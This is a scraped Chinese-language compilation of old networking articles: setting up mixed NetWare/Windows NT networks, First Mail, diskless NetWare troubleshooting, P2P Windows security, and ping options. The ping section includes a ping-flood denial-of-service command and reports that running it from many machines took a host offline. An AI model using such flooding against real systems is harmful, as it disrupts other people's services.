    1.工作站网卡的选择和连接
    为了能同时登录到Windows NT和NetWare网络，15台工作站上的网卡必须是双口网卡，现选择市面上普通的32BIT网卡(如果要安装无盘工作站，网卡的选择要十分慎重)。每一个网卡需同时连两条通信线，其中BNC接头接入同轴电缆线上串接的BNC的T型头，而RJ－45接口用双绞线连到24口的HUB上。
    2.工作站软件的安装
    因选用Windows95连入两个网络，所以每个工作站先预装Windows95操作系统，在确认网卡等所有硬件设备无故障和冲突之后再安装Windows NT客户“Client for Microsoft Networds”和NetWare客户“Client for NetWare Networks”。
    (1)安装Windows NT客户“Client for Microsoft Networds”
    选择“开始 /设置 /控制面板 /网络”，出现“网络”对话框。单击“网络”对话框中的“添加”按钮，又弹出“选定网络组件类型”的对话框，选择对话框中的“客户”选项，再单击“添加”按钮，会弹出“选定网络客户”的对话框，在此对话框的“厂商”下选择“Microsoft”选项，在“网络客户”处选择“Microsoft网络客户”，单击“确定”按钮，返回到起始的“网络”对话框。选择“网络”对话框中的“Microsoft网络客户”选项，单击“属性”按钮，将出现图2所示的“Microsoft网络客户属性”对话框，此对话框用于设置工作站所能登录的Windows NT的域名(此域名在安装NT服务器时建立)，当输入正确的服务器域名后，按“确定”按钮，此设置结束。
    (2)安装NetWare 客户“Client for NetWare Networks”
    选择“网络”对话框中的“添加”按钮，弹出“选定网络组件类型”的对话框，选择对话框中的“客户”选项，再单击“添加”按钮，会弹出“选定网络客户”的对话框，在此对话框的“厂商”下选择“Microsoft”选项，在“网络客户”处选择“NetWare网络客户”，单击“确定”按钮，返回到起始的“网络”对话框。选择“网络”对话框中的“NetWare网络客户”选项，单击“属性”按钮，将出现图3所示的“NetWare网络客户属性”对话框，在图3对话框的“首选服务器”处选择工作站要登录的NetWare服务器名(此服务器名必须是NetWare 服务器名称，否则无法登录)，并设置第一个网络驱动器名代号。按“确定”后设置结束。
    (3)关于登录的先后顺序的说明：
    如果在“网络”对话框的“基本网络登录方式”选项中所选的是“Microsoft网络用户”，则开机后先登录到NT网；如果选择的是“NetWare网络用户”，则开机后先登录到NetWare网络。建议NT服务器所使用的“域名”与NetWare服务器所使用的“服务器名”相同，并且在两个不同的服务器上给同一个工作站相同的用户名，这样要登录哪个服务器只需在“网络”对话框的“基本网络登录方式”处选择不同的登录方式便可以了， 避免每次开机时输入不同的“用户名”和“域名”。
    此混合型网络在安装好后的3个多月来运行正常。

返回


Novell和Windows NT混合网的组建

《一键清理系统垃圾》

Novell和Windows NT混合网的组建

    Novell网络和Windows NT网络是目前局域网中应用极为广泛的两种网络类型，这两种网络的单独规划和设计是大家较为熟悉的，但怎样将两者有机结合，互享系统资源，则是本文所要介绍的。本文所讲的“混合型网络”有两层含义，其一是指网络类型既包含Novell网也包含Windows NT网，其二是指网络的拓扑结构是总线型网络和星型网络的共存。文章以本单位所建的一个混合型网络为例，从网络的规划和选型、硬件的选择和连接、同时登录两个不同网络的工作站的设置等方面做以下介绍。
    一、网络的规划和选型
    1.网络的地理分布和用途
    此混合网络主要分布在办公大楼和教学大楼两处，且办公楼与教学楼相距较近，仅有80米左右。教学楼设有一个计算机房，主要供学生上机使用，有机器60多台(其中无硬盘286、386微机10多台),早已联网；办公楼也设有一个计算机房，供教师使用，现共有486以上的微机15台。
    2.混合局域网的设计和规划
    综合考虑网络的用途、现有机器的类型以及网络的安全等因素，网络规划为：因学生用机的部分硬件设备较差，为了充分利用所有硬件资源，保留原有的网络系统。办公楼的15台微机因硬件设备较好，同时主要是用于计算机教师的软件开发和对其他教师的培训，因而将这15台微机联成一个小型局域网。当两个局域网分别规划好后，便可进行两者的混连规划。其网络的整体规划结构如图1：
    3.网络的选型和连接
    教学楼部分保留原有的NetWare 3.12网络系统，由一个网络服务器带4个16口的HUB，每个HUB接16台微机，60余台微机全部连入此网络；办公楼的15台微机组建成Windows NT网，15台工作站以总线型结构采用同轴电缆线串联在NT服务器上。同时，用双绞线将这15台工作站以星型结构连接在由NetWare网引出的一个24口HUB上(15个工作站采用24口HUB连接是为了便于将来的扩充)。这样，一个网卡便连有两条网络连线，同时整个网络的拓扑结构基本上是以总线型网络为主干，以星型网为分支的混合型网络。
    二、网络服务器的安装
    1.对NetWare 3.12服务器的改造
    NetWare 3.12服务器已装有一个网卡，再连入15台工作站后，为了减轻一个网卡过重的工作负担，需再给服务器安装一个网卡，此网卡最好与原有的网卡同型号(16BIT，NE2000兼容卡)。为了能使一个服务器中的两个网卡都能同时工作，在将两个网卡安装好后，需修改服务器上的Autoexec.NCF文件，使每个网卡占用一个IRQ值，以防止地址冲突，而且不同的网卡需要有不同的Int与Port值。以下是安装两个网卡后的Autoexec.NCF文件的内容：
     server Name XYW
    IPX Internal Net 199801
    Load NE2000 Port=300 Int=3 Frame=Ether_802.3 Name=NCI1
    Bind IPX to NCI1 Net=A
    Load NE2000 Port=320 Int=5 Frame=Ether_802.3 Name=NCI2
    Bind IPX to NCI2 Net=B
    Mount all
    Load Monitor
    2.Windows NT网络服务器的安装
    NT网络服务器采用一台Pentium 200 CPU、3.2G硬盘、64MB RAM的兼容机为服务器，网卡为32BIT双口(具有RJ－45接口和BNC接头)的PCI卡(带有NT4.0的网卡驱动程序)。网络操作系统为中文Windows NT Server 4.0。具体的安装过程请参考有关指导书，不过为了顺利地安装和维护，提以下几点建议：
    (1)将“服务器类型”选为“主域控制器(PDC)”；
    (2)虽然NT4.0自身提供了大量的网卡驱动程序，但为了能够正确安装，最好使用网卡自带的驱动程序；并记下网卡在没有冲突时的IRQ 和I/O的值；
    (3)网络协议选择为NWlink和NetBEUI两种；
    (4)输入并记下服务器的“域名”；
    (4)为了日后网络服务器维护的方便，最好制作一张紧急修复磁盘。
    三、NT工作站的安装
    虽然可以由DOS、Windows3.x、Windows NT Workstation和Windows95等工作站登录到Windows NT Server 4.0服务器，但笔者在实际安装中认为Windows95可以说是NT4.0最佳的工作站操作系统。同时这15台NT工作站必须要同时登录到Windows NT和NetWare网络，因而15台工作站全部选择用Windows95登录。
    1.工作站网卡的选择和连接
    为了能同时登录到Windows NT和NetWare网络，15台工作站上的网卡必须是双口网卡，现选择市面上普通的32BIT网卡(如果要安装无盘工作站，网卡的选择要十分慎重)。每一个网卡需同时连两条通信线，其中BNC接头接入同轴电缆线上串接的BNC的T型头，而RJ－45接口用双绞线连到24口的HUB上。
    2.工作站软件的安装
    因选用Windows95连入两个网络，所以每个工作站先预装Windows95操作系统，在确认网卡等所有硬件设备无故障和冲突之后再安装Windows NT客户“Client for Microsoft Networds”和NetWare客户“Client for NetWare Networks”。
    (1)安装Windows NT客户“Client for Microsoft Networds”
    选择“开始 /设置 /控制面板 /网络”，出现“网络”对话框。单击“网络”对话框中的“添加”按钮，又弹出“选定网络组件类型”的对话框，选择对话框中的“客户”选项，再单击“添加”按钮，会弹出“选定网络客户”的对话框，在此对话框的“厂商”下选择“Microsoft”选项，在“网络客户”处选择“Microsoft网络客户”，单击“确定”按钮，返回到起始的“网络”对话框。选择“网络”对话框中的“Microsoft网络客户”选项，单击“属性”按钮，将出现图2所示的“Microsoft网络客户属性”对话框，此对话框用于设置工作站所能登录的Windows NT的域名(此域名在安装NT服务器时建立)，当输入正确的服务器域名后，按“确定”按钮，此设置结束。
    (2)安装NetWare 客户“Client for NetWare Networks”
    选择“网络”对话框中的“添加”按钮，弹出“选定网络组件类型”的对话框，选择对话框中的“客户”选项，再单击“添加”按钮，会弹出“选定网络客户”的对话框，在此对话框的“厂商”下选择“Microsoft”选项，在“网络客户”处选择“NetWare网络客户”，单击“确定”按钮，返回到起始的“网络”对话框。选择“网络”对话框中的“NetWare网络客户”选项，单击“属性”按钮，将出现图3所示的“NetWare网络客户属性”对话框，在图3对话框的“首选服务器”处选择工作站要登录的NetWare服务器名(此服务器名必须是NetWare 服务器名称，否则无法登录)，并设置第一个网络驱动器名代号。按“确定”后设置结束。
    (3)关于登录的先后顺序的说明：
    如果在“网络”对话框的“基本网络登录方式”选项中所选的是“Microsoft网络用户”，则开机后先登录到NT网；如果选择的是“NetWare网络用户”，则开机后先登录到NetWare网络。建议NT服务器所使用的“域名”与NetWare服务器所使用的“服务器名”相同，并且在两个不同的服务器上给同一个工作站相同的用户名，这样要登录哪个服务器只需在“网络”对话框的“基本网络登录方式”处选择不同的登录方式便可以了， 避免每次开机时输入不同的“用户名”和“域名”。
    此混合型网络在安装好后的3个多月来运行正常。

返回


NOVELL网上的电子邮件系统First Mail

《一键清理系统垃圾》

NOVELL网上的电子邮件系统First Mail

对Windows NT上的电子邮件系统，大家可能已经非常熟悉了。这里要介绍的是运行在NetWare上的、占用资源极少且性能先进的电子邮件系统——First Mail。本文的介绍将以NetWare 3.12环境为主，在NetWare 4.1中，First Mail的安装、使用方法与此稍有不同，不仅更方便且支持NDS，详情请参见NetWare 4.1的有关文档。

一、安装环境

1.硬件：文件服务器安装有CD－ROM，内存不少于8MB，硬盘的NetWare分区上可用空间不少于4MB。

2.软件：文件服务器运行在NetWare 3.12上，且服务器上已备有下列软件：NetWare Btrieve V5.15或更高版本、NetWare C运行库（CLIB.NLM）V3.11e或更高版本。如果你无法得到上述两个软件的单独发行版，你可从NetWare 4.1中将相关文件拷贝出来。运行Btrieve你需要的文件为：bspxcom.nlm、btrieve.nlm、brequest.exe、brequtil.exe、nstart.ncf。

二、安装MHS和First Mail

1.在文件服务器上加载Install模块，在文件服务器控制台上键入命令：

Load Install；

2.在Install选项中，选Product Options，回车；

3.将NetWare 3.12光盘放入CD－ROM，假设CD－ROM的盘符为D；

4.按Insert键，屏幕将提示输入产品所在目录，这时键入：

D:\NETWARE.312\BASICMHS；

5.按系统提示回答以下问题：

[Default] Workgroup long name: FS1999（缺省，工作组的长名为：FS1999）

Accept Workgroup long name?[Yes|No|Quit]: >Y（确认这个名字？）

[Default] Workgroup short name: FS1999（缺省，工作组的短名为：FS1999）

Accept Workgroup long name?[Yes|No|Quit]: >Y（确认这个名字？）

[Default] Mail Volume Path: FS1999/SYS:（缺省，邮件卷路径为FS1999/SYS：）

Accept Mail Volume Path?[Yes|No|Quit]: >Y（确认这个路径？）

Enable Messagin Services for Existing Users? [Yes|No|Quit]: >Y（为所有用户开放邮件服务？）

Use Full name for user's mail name? [Yes|No|Quit]: >N（是否为用户的邮件地址创建全名？）

Update System Login? [Yes|No]: >Y（自动更新系统注册底稿吗？）

Update Autoexec.ncf File? [Yes|No]: >Y（自动更新AUTOEXEC.NCF文件吗？）

说明：First Mail中用户的邮件地址格式为：〈User Name〉@〈Workgroup〉。在上述安装过程中，由于在“创建全名”时选择N，系统默认〈User Name〉为Login Name。假设网上现有登录名为Guest、Goodboy、Chinablue的三个用户，在上述安装过程中他们的邮件地址就分别被分配为：guest@fs1999、goodboy@fs1999、dhinablue@fs1999。

6.用DOWN命令关闭文件服务器，再重新启动，MHS将自动加载。

7.在服务器控制台上键入：LOAD BSTART。当屏幕上出现一个选单，选择Set

Configuration。

请把下列参数设置到指定的水平：

Number of transaction=2（或更多）

Largest page size=4096

至此也就完成了MHS和First Mail的全部安装工作。

三、卸载MHS

作为管理员，也许希望在某些时候关闭邮件系统，此时可在服务器控制台上键入命令：UNLOAD BASICMHS。这个命令仅仅关闭邮件服务功能，且不会影响文件服务器的正常运行。

四、管理和配置First Mail

ADMIN在工作站端使用。

1.运行ADMIN之前，必须先运行BREQUEST。BREQUEST将作为TSR驻留在内存中，使用完毕可用命令BREQUTIL －STOP卸载。

2.键入命令：ADMIN，屏幕将出现Admin Function选单。

3.Admin Function中各选项说明：

Users(用户)：选此项将显示所有邮件帐户。用INS键可加入新的邮件账户。

Distribution list（分发清单）：建立分发清单可将同一邮件发送给多个用户。

Applications（应用程序）：有些独立的邮件应用系统也支持MHS，你可以通过本选项将其挂接在MHS上。具体情况请参见独立邮件系统的说明和ADMIN.DOC。

Configuration（配置）：允许你修改MHS的配置，详情请见ADMIN.DOC。

五、使用First Mail

1.要启动FirstMail，应运行PUBLIC目录中的MAIL.EXE程序。

2.Mail Options中各选项说明：

N：Check for New Mail（阅读新邮件选项）。当收到新邮件时，这一项会出现在First Mail窗口的最上面，你可用此项阅读新邮件。如果没有新邮件，则此项不出现。 S：Send a Mail Message（发送邮件选项）。这个选项用于发送、编辑邮件。在“TO：”后面填入邮件地址，也可按F2键从地址簿中选择。在“Subj：”后面填入邮件主题。写好邮件后，用〈CTRL〉＋〈ENTER〉将邮件发出。你还可以用F7键附加文件，让它们随邮件一起发出。附加文件的类型不限，但不能多于64个。

B：Browse Mail Messages（阅读、回复、转发邮件选项）：本项可用来查看已阅读过的邮件。要回复一个邮件，按R键。要转发一个邮件，按F键。要将一个邮件打印出来，按P键。

C：Change File Server（改变文件服务器选项）：有一个以上的文件服务器运行且你的邮件在另一个文件服务器上时，你需要用到此项。

P：Preferences（设置选项）可供设置内容如下：

“Copy－Self Settings”：定义发送邮件后是否自己留底。

“Editor and Keyboard Settings”：配置编辑器。

“General Settings”：配置First Mail的操作方式。

“NetWare SMF/MHS Settings”：有关MHS的设置。

“Change Home Mailbox Location”：修改邮件位置。

“Print Settings”：打印设置。

“Edit or Create Singnatures”：编辑或创建签字文本。

返回


Novell无盘网络常见问题与对策

《一键清理系统垃圾》

Novell无盘网络常见问题与对策

    Novell局域网络在许多单位有着广泛的应用，特别是管理方便且可以节约硬件成本，能够有效防止病毒入侵和重要信息被下载的无盘网络。随着软硬件的不断升级和网络规模的扩大，原先的网络需要改造升级或重新安装过程中，会遇到许多问题，现结合笔者多年来使用NetWare的经验，就一些常见问题加以分析，并给出相应的解决对策。
    问题1：服务器网卡驱动程序不能正确加载
    这是安装过程中最常见的一种故障。造成这一故障的原因有多种，一是对于大多数厂家的网卡，NetWare无法自动识别。二是用户选择的网卡驱动程序有错。要特别注意的是，NetWare服务器端网卡驱动程序的扩展名为LAN，通常存于驱动程序盘的Server子目录下，而工作站端使用的网卡扩展名为com或exe，一般存于驱动程序盘的DOS、Windows 9x或Windows NT等子目录下，并且不同客户机操作系统所用的网卡驱动程序也不一样。三是网卡本身参数配置有错，不能正常工作，或者是NetWare给网卡提供的中断号或IO地址缺省值与网卡的配置不相同，遇到这种情况需要手工改为正确的值。最后一种情况是EISA和PCI网卡未指定插槽（Slot）号，或其值错误。
    遇到网卡驱动程序不能正确加载的情况时，可以跳过这一步继续后面的安装，不会受到影响（Netware 5.x版不行）。在服务器安装完成后，重新启动NetWare服务器，进入控制台状态，首先加载Install菜单模块，然后将加载网卡驱动程序的有关语句写入autoexec.ncf文件中。可以按下面格式书写：
    LOAD <NE2000.LAN> INT=<3> PORT=<300>
    FRAME=<ETHERNET_802.2> NAME=<A>
    BIND IPX TO <A> NET=<1>
    括号内的值可根据具体情况填写。
    问题2：Netware3.X与4.X和5.X无法集成在同一物理网络中
    由于3.X版没有目录服务功能，因此无法将其纳入到目录树中，常与4.X和5.X版产生冲突，而使客户无法登录到3.X版服务器，从而出现3.X服务器被“压倒”的现象，所以建议把已有的3.X版升级为4.X以上的版本，然后将其集成到一个目录树上，克服版本差别造成的故障。注意：同一物理网上的所有服务器的逻辑网络号必须一样（不是IPX内部网络号），否则将造成路由检测故障。
    问题3：文件服务器不能正常启动，提示卷安装失败
    由于突然停电或某些别的原因可能造成卷的损伤，其现象有多种，例如：服务器无法正常安装卷，或服务器能正常启动，但工作站不能与服务器连接等，出现类似下面的提示：“Mirror copies of directories and name space not match”，“Volume not mounted”此时，可以采用卷修复方法对不太严重的错误进行修复，VREPAIR（Volume Repair）是一个功能强大的可装入模块，具体的修复步骤如下：
    1）把此卷卸下：
    Dismount volume－name （其中，volume－name为要修复的卷名）
    2）在服务器控制台上键入以下命令：
    LOAD VREPAIR
    3）进入菜单系统，首先选择“Repair a Volume”，然后屏幕提示：
    Total errors:0
    Current settings:
    1.Pause after each error
    2.Do not log errors to a file
    Press F1 to change setting
    在修复时如果屏幕提示错误较多，可按F1键不必让VREPAIR在每个错误停下来，可以大大提高修复速度。
    4）当VREPAIR运行结束后，屏幕提示：“write vrepairs to the disk（y/n）?”选择“y”将修复结果写入磁盘，进行如此操作后，若卷仍未修复，可再进入VREPAIR菜单中选择 “set vrepair option”项，运行完后卷大多安装成功，如在此之后仍不能安装卷。则必须删除这个卷，用Install重新安装这个卷，并从后备文件中恢复数据。
    如果因意外原因造成目录服务出现故障，可在服务器控制台上运行如下命令进行修复Load dsrepair。
    问题4：在服务器启动过程中，突然停下来询问服务器的名称，内部网络号
    按屏幕提示输入文件服务器名（File server name）和IPX内部网络号（IPX Internal network number）后，进入控制台提示符“：”状态，此时装入其它NLM模块，系统提示：“unable to find load file …”。
    这种故障可能是由以下原因所致：
    1．由系统配置文件所致autoexec.ncf或startup.ncf损坏，autoexec.ncf的主要作用就是给文件服务器起名、分配IPX内部网络地址、加载网卡驱动程序、分配网卡传输协议、分配网段地址及装载指定的NLM等。可以从以下几个方面来确定其原因：
    1）该文件中的多个逻辑网卡（以帧不同来区别）对应的逻辑网络号相同（指BIND语句中“NET=”后面的参数相同），正常情况下应互不相同。
    2）某些语句的参数不完整，例如服务器名、IPX内部网络号、逻辑子网号、PORT值、中断号、IP地址和子网掩码等丢失。
    3）缺少某些必需的语句，例如网卡加载语句后面无BIND语句或不配对，没有卷安装语句等等。
    4）该文件中的服务器名或IPX内部网络号与同一物理网络上的其他服务器相同。最后一种情形是该文件中逻辑子网络号与同一物理网上其他的服务器不同（要求必须一样，否则将产生冲突）。解决方法是从备份恢复，或利用Install程序重新建立autoexec.ncf。
    2．sys卷有故障，NetWare系统核心Server.exe装入startup.ncf中的硬盘驱动程序后，无法从损坏的系统卷中找到autoexec.ncf，可按照上一问题的方法对sys卷进行修复，修复之后即能正常启动。
    最后要看一下CMOS设置是否正确，特别是对安装有多个硬盘（每个硬盘针对不同的用途）的用户，有时经常换硬盘而便忘了修改设置硬盘参数等项。
    问题5：工作站节点不能扩大
    当无盘工作站超过255台时，出现后续无盘站不能建立正常网络连接，只有部分无盘站在任何时候都可以上网，以及部分无盘站先开机可以上网等问题。
    这是由于无盘站网卡上的启动芯片（Boot Prom）定义的连接号的位数不同所致。早期的无盘工作站启动芯片（即IPX Remote Boot Prom）绝大部分用8位表示，最多可连接255台，而现在市场上供应的增强型启动芯片（即Enhanced Remote Boot Prom）用16位表示，就不存在这个问题。旧型IPX芯片在初始化启动时，会使用802.3帧格式发出一个“Get Nearest Server”帧到网上，用户可以在服务器控制台上运行TRACK ON屏幕命令观察这条信息，通过这种方法来确定使用的芯片是否为旧型IPX启动芯片。这种旧型IPX芯片不需要服务器端设置RPL支持，但在制作客户端启动软盘时，必须在LSL.COM命令后运行RPLODI.COM，然后再执行网卡驱动程序（如NE2000.COM）。
    增强型启动芯片在初始化时，全使用802.2帧格式发出一个“FIND”帧，这时从TRACK　ON屏幕上看不到“Get nearest Server”信息，通过802.2格式的“找——找到（find－found）”方式连接到服务器上。这种芯片不能使用RPLODI.COM，在服务器端需设置RPL协议支持即需要Autoexec. ncf中添加两句Load RPL，Bind rpl to <ne2000> frame=<ethernet_802.2>。
    因此对网卡型号多，购买时间不同这种情况，应制作多个远程启动映像文件，并配置Bootconf.sys。在服务器上，对每一块网卡都安装“Ethernet－802.2”和802.3帧类型。
    问题6：运行大型程序，网络速度慢
    随着应用程序的不断增大，特别是突发流量发生时（像同时开机远程启动Win95时），必然有大量的数据交换，造成网络通信性能下降。
    为了提高网络速度，在服务器“中枢机关”（CPU，内存）性能良好的前提下，可采用增加网段的方法来解决。由于大多网络（如教学网）都采用总线型和星型混合的拓扑结构，这里的增加网段就是在文件服务器中多插几块网卡（最多可插四块），将局域网上的工作站平均分给这几个网段，再在Autoexec.ncf中写入以下类似命令。注意I／O地址值和IRQ值必须与网卡实际占用的I／O地址和IRQ值一一对应。
    Load ne2000 port=300 int=2 frame=ethernet_802.2 name=a
    Bind ipx to a net=1
    Load ne2000 port=320 int=3 frame=ethernet_802.2 name=b
    Bind ipx to b net=2
    这样每段网络的负担只有原来的几分之一，速度自然就提高了。
    问题7：无盘工作站不能正常登录服务器
    有以下几种情况：
    1．工作站屏幕上出现“Error opening boot disk image file ”OR“Unable to open image file”
    这可能是连到了一个没有包含远程启动映像文件的服务器。把启动映像文件拷到这个服务器的Login目录下；如果使用的是多远程启动映像文件，检查Bootconf.sys中对工作站是否进行了正确设置，应确保网络地址和节点地址的正确，如果以上都正确，那么可能是远程启动映像文件有问题，可以测试生成启动映像文件的软盘能否正常启动有盘工作站。若还不行，可以运行一下RPLFIX实用程序。
    2．工作站屏幕上出现“Error finding server”
    在确保硬件线路连接没问题的前提下，检查服务器上是否安装了“Ethernet_802.3”帧类型，远程启动映像文件的net.cfg 中是否包含Ethernet_802.3，这种就是前面所说的旧型的IPX芯片，它不支持Ethernet－802.2帧。按照相应的帧类型重新制作启动映像文件。
    3．工作站在从远程启动映像文件装入网卡驱动时挂起，屏幕并显示下面类似信息：Ethernet card is improperly install or net connected the network.
    这就是由于前面所说的旧式IPX芯片在Netware 4.X以上使用时，在远程启动映像文件中没有RPLODI.com或远程启动映像文件的批处理文件中ISL.com下行没有RPLODI.com行。
    4．工作站显示“Loading MS－DOS”并挂起
    这是由于远程启动映像文件使用了DOS　5．0或以上版本，对远程启动映像的文件运行RPLFIX实用程序。
    5．屏幕上出现“batch file missing”
    出现这个消息是由于autoexec.bat或其它批处理文件（对多个远程启动映像所使用的批处理）没有同时存在于LOGIN目录和用户登录目录。
    问题8：其它应用或运行故障
    1．工作站无法转入网络盘F
    这主要是由于远程启动映像文件Config.sys中Lastdrive的值所引起的，解决方法是对于IPX和ODI工作站（使用NETX外壳），Lastdrive=E或将其删除，对于VLM工作站，应在config.sys中加入Lastdrive=Z这一句
    2．无法正常运行Netadmin实行程序
    Netadmin程序是基于目录服务的管理程序，在Netware 4.X版中使用，因此，这种故障是由于采用了IPX或ODI（使用NETX外壳）工作站方式登录入网造成的，必须改由具有目录服务功能的VLM外壳工作站登录才行。


P2P中保障Windows网络安全的五大步骤

《一键清理系统垃圾》

P2P中保障Windows网络安全的五大步骤

    导读-- 我曾经管理了10年的P2P Windows网络。下面我对如何确保这种网络中系统的安全提出五个步骤

    似乎大多数强化Windows的建议都将帮助你在NT域名或者活动目录中确保Windows的安全。如何确保P2P Windows网络的安全呢?有许多采用Windows工作站而没有中央服务器的网络。这种网络常见于小企业或者大企业的小部门。这种配置也许有些不同，但是，这并不意味着不存在统一的安全漏洞，也并不意味着这里存储的数据没有大型设置中存储的数据重要。

    我曾经管理了10年的P2P Windows网络。下面我对如何确保这种网络中系统的安全提出五个步骤:

    1.必须有本地的安全策略

    增强每一个个人的系统安全是重要的，因为在这种设置中没有组策略，你必须要依赖Windows本地的安全策略。你可以通过Window控制面板或者通过运行secpol.msc或者secpol.msc来访问你的本地安全策略设置。

    要记住，你需要做的关键的设置包括:启用审计失败事件的记录、要求使用Ctrl+Alt+Del键登录、创建一个口令策略、启用一项通知试图登录的用户的文本消息，在用户登录时告知用户可接受的使用策略、以及不显示最后一个用户的名字。

    2.需要批准共享

    在P2P环境中，你还需要向网络中的每一个人通报共享。如果没有这样做，要记住最低限度的规则并且设置共享许可，这样用户能够浏览并看到允许他们看到的东西。

    3.文件许可非常重要

    按照共享批准的同一个原则，需要在本地的每一个系统建立文件许可，以保证只有得到授权的人才能打开、修改和删除文件。

    4.加密离线文件

    在P2P环境中需要Windows离线文件加密功能是普通的，特别是对于移 动用户来说更是如此。如果你使用这种功能，确保使用这些Windows指南加密你的文件。最好是考虑使用PGP桌面专业版或者SecureStar DriveCrypt加密软件对硬盘进行部分加密或者全部加密，以确保你的移 动数据的安全。

    5.评估你的网络安全

    定期评估你的P2P网络安全也是非常重要的。在评估的时候要确保记住以下事情:

    ·对各个系统实施本地安全策略一致性检查。使用免费的和商业性的软件工具就很容完成这种检查。这类工具包括Foundstone公司的SuperScan和GFI LANguard公司的网络安全扫描器。

    ·检查不属于各个系统所有的本地用户账号。

    ·确认为各个系统设置的你的共享和文件许可是恰当的。

    ·查找不应该共享的文件夹和硬盘，或者查找不应该存在的文件夹和硬盘。这在P2P网络中是特别普通的事情。在P2P网络中硬盘和文件夹共享是正常的。

    ·无论你使用什么工具，在进行测试的时候，要确保实施经过身份识别的扫描(以标准的用户、管理员或者这两者的身份登录)和未经过身份识别的扫描(仅使用零会话连接，而不登录)。这会使你了解网络的真实状况，了解哪里配置错误了，并且了解不守纪律的内部人员或者外部黑客能够在你的系统里看到什么。

    在P2P环境中实际执行安全策略是非常困难的事情。但是，这个事情仍需要去做。尽可能地使用上述Windows控制方法可以将黑客拒之门外并且保持用户的连接。定期地结合基本的、有效的安全测试进行上述测试将有助于保证你的机构的P2P网络的安全。


PING命令的高级用法

《一键清理系统垃圾》

PING命令的高级用法

    对于Windows下ping命令相信大家已经再熟悉不过了，但是能把ping的功能发挥到最大的人却并不是很多，当然我也并不是说我可以让ping发挥最大的功能，我也只不过经常用ping这个工具，也总结了一些小经验，现在和大家分享一下。
    现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧，ping只有在安装了TCP/IP协议以后才可以使用：

以下内容跟帖回复才能看到
==============================

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [-j computer-list] │ [-k computer-list] [-w timeout] destination-list

==============================

Options:

-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.

不停的ping地方主机，直到你按下Control-C。
此功能没有什么特别的技巧，不过可以配合其他参数使用，将在下面提到。
-a Resolve addresses to hostnames.

解析计算机NetBios名。

示例：
C:\>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。
-n count Number of echo requests to send.
发送count指定的Echo数据包数。
    在默认情况下，一般都只发送四个数据包，通过这个命令可以自己定义发送的个数，对衡量网络速度很有帮助，比如我想测试发送50个数据包的返回的平均时间为多少，最快时间为多少，最慢时间为多少就可以通过以下获知：
C:\>ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
    从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中，返回了48个，其中有两个由于未知原因丢失，这48个数据包当中返回速度最快为40ms，最慢为51ms，平均速度为46ms。
-l size Send buffer size.
定义echo数据包大小。
    在默认的情况下windows的ping发送的数据包大小为32byt，我们也可以自己定义它的大小，但有一个大小的限制，就是最大只能发送65500byt，也许有人会问为什么要限制到65500byt，因为Windows系列的系统都有一个安全漏洞（也许还包括其他系统）就是当向对方一次发送的数据包大于或等于65532时，对方就很有可能当机，所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制，但这个参数配合其他参数以后危害依然非常强大，比如我们就可以通过配合-t参数来实现一个带有攻击性的命令：（以下介绍带有危险性，仅用于试验，请勿轻易施于别人机器上，否则后果自负）
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
………………
    这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包，如果你只有一台计算机也许没有什么效果，但如果有很多计算机那么就可以使对方完全瘫痪，我曾经就做过这样的试验，当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时，不到5分钟对方的网络就已经完全瘫痪，网络严重堵塞，HTTP和FTP服务完全停止，由此可见威力非同小可。
-f Set Don';t Fragment flag in packet.
在数据包中发送“不要分段”标志。
在一般你所发送的数据包都会通过路由分段再发送给对方，加上此参数以后路由就不会再分段处理。
-i TTL Time To Live.
指定TTL值在对方的系统里停留的时间。
此参数同样是帮助你检查网络运转情况的。
-v TOS Type Of Service.
将“服务类型”字段设置为 tos 指定的值。
-r count Record route for count hops.
在“记录路由”字段中记录传出和返回数据包的路由。
    在一般情况下你发送的数据包是通过一个个路由才到达对方的，但到底是经过了哪些路由呢？通过此参数就可以设定你想探测经过的路由的个数，不过限制在了9个，也就是说你只能跟踪到9个路由，如果想探测更多，可以通过其他命令实现，我将在以后的文章中给大家讲解。以下为示例：
C:\>ping -n 1 -r 9 202.96.105.101 （发送一个数据包，最多记录9个路由）
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
    从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ，202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。
